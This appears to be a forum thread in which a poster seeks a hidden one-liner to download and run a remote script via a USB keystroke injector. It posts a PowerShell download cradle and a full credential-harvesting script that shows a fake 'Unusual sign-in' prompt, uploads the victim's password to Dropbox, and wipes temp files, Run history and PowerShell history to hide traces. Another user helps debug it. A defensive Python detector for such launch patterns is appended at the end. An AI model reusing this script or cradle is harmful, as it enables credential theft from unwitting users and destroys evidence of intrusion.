Jbv Posted November 5

I've got a PowerShell command here that does everything I want it to, but it only works for .ps1 files.

powershell -w h -c "iex ([Text.Encoding]::UTF8.GetString((iwr 'https://DROPBOX-LINK' -UseBasicParsing).Content))"

Been trying to find a command that is as concise as this that works for a .vbs file, but cannot seem to find anything. Any help on how to create a command that has the same functionality as the .ps1 version, but for .vbs, would be greatly appreciated!
dark_pyrro Posted November 6

Just a bit confused about the use case here. What is the reason why PowerShell can't be used on the target? Blocked? (Sounds a bit odd that PowerShell isn't allowed, but VBS is.) As I understand it, you are trying to obtain the byte code of a string from a source on Dropbox, and this is what puzzles me. Why cross the stream for water? Why obtain a byte/hex based source from the internet, convert it to text, and then run the command that the text represents when the Ducky is already available on the target and able to type strings? Why download it as hex/bytes and then convert it to text? In need of some sort of obfuscation? There must be reasons for this, but as long as it's a "black box", it's a bit difficult to suggest a valid alternative. A thing that adds to the confusion is the title of the thread: "Execute a powershell command through 'RUN' which runs a .vbs file located in a dropbox". Why avoid using PowerShell (and use VBS) if it still is PowerShell that initiates it all? That means PowerShell isn't blocked. It might be monitored, though, but in that case VBS could be as well; otherwise something's wrong in the cybersec design/architecture of the environment at hand.
Jbv (Author) Posted November 7

Thank you for your response. I've got a PowerShell script on Dropbox that I need to be run hidden, without displaying any windows. I cannot run the entire PowerShell script through the Ducky as it is quite long; for that reason it would take a lot of time to input the entire script. I've found that retrieving the script from outside the Ducky is more efficient. Initially, I attempted to run the PowerShell script from my Dropbox through a PowerShell command, which I couldn't get working without some kind of window popping up. As a workaround, I decided to experiment with running the script with VBS, which ended up working perfectly. Now, I'm trying to get a command to run a VBS script from my Dropbox, which then runs a PowerShell script from my Dropbox (great workaround, I know). I need the command to be relatively short and on one line so I can execute it directly from 'Run', which is the fastest method. Hope that gives you a better idea of where I am at.
dark_pyrro Posted November 7

I don't fully get the "run a VBS script on my dropbox" or "runs a PowerShell script on my dropbox". You can't execute things *on* Dropbox. You can of course obtain (download) things from Dropbox, but they have to be executed on the target device, not on Dropbox. Looking at your previously posted "one-liner", I see that you execute PowerShell with "-w h", which is supposed to hide the PS window. But I guess that it's not enough for you since PowerShell pops up anyway for a short while and isn't actually fully hidden/stealthy. Is that correct, or is the PowerShell window visible to you in any form during execution (i.e. for a longer while than just flashing up and then going away)? However, you will most likely have issues getting it to execute totally silently. I mean, it won't be silent anyway since the Windows Run dialog will show no matter what you try. The payload needs to trigger/kick off in some way; not sure how you would be able to pull that off without having something that ignites it all. You could try various lolbins and see if they can download and execute things all stealthily, but I don't think so; most will pop up something that will be visible.
Jbv (Author) Posted November 7

Yes, I meant downloaded from Dropbox and run on the target device. The issue I encounter when I run it with PowerShell using "-w h" is that PowerShell minimises after the command is run, but never closes. (You can simply click on it to bring it back up.) This is not about the .ps1 script but rather the command that initiates it, from what I can understand, as this does not happen when it's run with VBS. To put it in simpler words, running the .ps1 file directly with PowerShell causes the following: the Run window flashes, a PowerShell window appears and minimises, but never closes until the .ps1 script is complete. None of those happen when the script is run with the VBS file. I'm not quite sure why the PowerShell command causes the .ps1 file to execute with a visible window. I could attach the code behind the .ps1 file I'm trying to execute if you'd like? It could help you get a better understanding of why that might be happening.
dark_pyrro Posted November 7

That behavior sounds a bit odd. It should hide. You can of course post the PowerShell code.
Jbv (Author) Posted November 10

The script below generates an "Unusual login" prompt asking the victim for their password. (This is a slightly modified version of Jackoby's Rubber Ducky "Credz-Plz" script.)

$DropBoxAccessToken = ""
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"

<#
.NOTES
This generates the ui.prompt to harvest the credentials
#>
function Get-Creds {
    do{
        $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);
        $cred.getnetworkcredential().password
        if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
            [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
            Get-Creds
        }
        $creds = $cred.GetNetworkCredential() | fl
        return $creds
        # ...
        $done = $true
    } until ($done)
}

<#
.NOTES
This pauses the script until mouse movement is detected
#>
function Pause-Script{
    Add-Type -AssemblyName System.Windows.Forms
    $originalPOS = [System.Windows.Forms.Cursor]::Position.X
    $o=New-Object -ComObject WScript.Shell
    while (1) {
        $pauseTime = 3
        if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
            break
        } else {
            $o.SendKeys("{CAPSLOC}");Start-Sleep -Seconds $pauseTime
        }
    }
}
# This script repeatedly presses the capslock button (OUTDATED, IGNORE!)

# This function makes sure that capslock is turned off before ui.prompt appears
function Caps-Off {
    Add-Type -AssemblyName System.Windows.Forms
    $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
    #If true, toggle CapsLock key, to ensure that the script doesn't fail
    if ($caps -eq $true){
        $key = New-Object -ComObject WScript.Shell
        $key.SendKeys('{CapsLock}')
    }
}

<#
.NOTES
This freezes the function until mouse movement is detected, after which it activates the pop-up
#>
Pause-Script
Caps-Off
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in.
Please authenticate your Microsoft Account")
$creds = Get-Creds

<#
.NOTES
This saves the gathered credentials to a file in the temp directory
#>
echo $creds >> $env:TMP\$FileName

<#
.NOTES
This uploads the gathered credentials file to the dropbox
#>
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers

<#
.NOTES
This removes most traces of you, and evidence to prove you were there
#>
# Deletes contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Deletes run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Deletes powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
dark_pyrro Posted November 11

Can't see why that script shouldn't be possible to run with a hidden window. I just made a quick test (downloading the script from a server and then executing it) and it works.
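From the defender's side, the launch pattern discussed in this thread (a hidden-window PowerShell that fetches and evaluates remote text, or PowerShell spawned by a script host such as wscript.exe) is what process-creation telemetry should flag. The checker below is an added example, not code from the thread or from any of its participants; the event field names ('image', 'parent', 'cmdline') and the sample records are constructed assumptions to be mapped onto your own Sysmon Event ID 1 or 4688 data.

```python
import re
from pathlib import PureWindowsPath

# Launch-pattern indicators; case-insensitive, covering abbreviated parameters.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b")
INVOKE_EXPR = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
NET_FETCH = re.compile(r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                       r"downloadstring|downloadfile|net\.webclient)\b")
POLICY_BYPASS = re.compile(r"(?i)-ex(?:ecutionpolicy)?\s+bypass\b")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

def analyze(event):
    """Return indicator names for one process-creation event (dict with the
    assumed keys 'image', 'parent', 'cmdline'; map your telemetry onto them)."""
    hits = []
    if PureWindowsPath(event["image"]).name.lower() not in ("powershell.exe", "pwsh.exe"):
        return hits
    cmd = event["cmdline"]
    if HIDDEN_WINDOW.search(cmd):
        hits.append("hidden_window")
    # A download cradle needs both a network fetch and evaluation of the fetched text.
    if INVOKE_EXPR.search(cmd) and NET_FETCH.search(cmd):
        hits.append("download_cradle")
    if POLICY_BYPASS.search(cmd):
        hits.append("execution_policy_bypass")
    if PureWindowsPath(event["parent"]).name.lower() in SCRIPT_HOSTS:
        hits.append("script_host_parent")
    return hits

def is_suspicious(event):
    """Alert on any cradle, or on two or more weaker indicators together."""
    hits = analyze(event)
    return "download_cradle" in hits or len(hits) >= 2

# Constructed sample events (not real telemetry): the thread's one-liner, the
# VBS-launches-PowerShell chain the poster describes, and a benign baseline.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w h -c \"iex ([Text.Encoding]::UTF8.GetString("
                "(iwr 'https://DROPBOX-LINK' -UseBasicParsing).Content))\""},
    {"image": PS, "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Public\stage.ps1"},
    {"image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
]
```

The parent-process check is what catches the VBS-then-PowerShell chain even when the PowerShell command line itself looks ordinary.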